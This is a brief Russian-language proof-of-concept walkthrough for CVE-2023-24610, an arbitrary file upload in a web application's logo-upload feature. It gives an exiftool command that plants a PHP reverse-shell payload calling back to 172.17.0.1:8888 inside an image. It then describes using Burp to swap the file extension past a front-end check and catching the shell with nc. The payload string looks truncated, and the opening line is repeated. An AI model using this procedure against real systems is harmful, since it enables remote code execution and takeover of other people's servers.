
Это доказательство концепции для CVE-2023-24610
Это proof of concept для CVE-2023-24610
Начнём с создания полиглот‑файла с помощью exiftool: exiftool -Comment="/dev/tcp/172.17.0.1/8888 <&1\''); ?>" avatar.png -o polyglot.php

Переименовываем файл в .png, чтобы он прошёл проверку на стороне фронтенда.

После этого запускаем nc‑слушатель на порту 8888, чтобы принять обратную оболочку.

Следующий шаг — войти в приложение и нажать на "setup".

Внизу страницы видим область для логотипа практики. Загрузить файл можно кнопкой "edit" справа.

Нажимаем "edit", затем "browse" и выбираем созданный ранее файл с расширением ".png".

Перед загрузкой перехватываем запрос с помощью Burp (или аналогичного инструмента). Нажимаем "upload" и в Burp меняем расширение файла с "png" на "php".

Отключаем перехват, чтобы файл загрузился, и проверяем ранее запущенный nc‑слушатель. Получаем обратную оболочку; IP указывает на наш Docker‑контейнер.
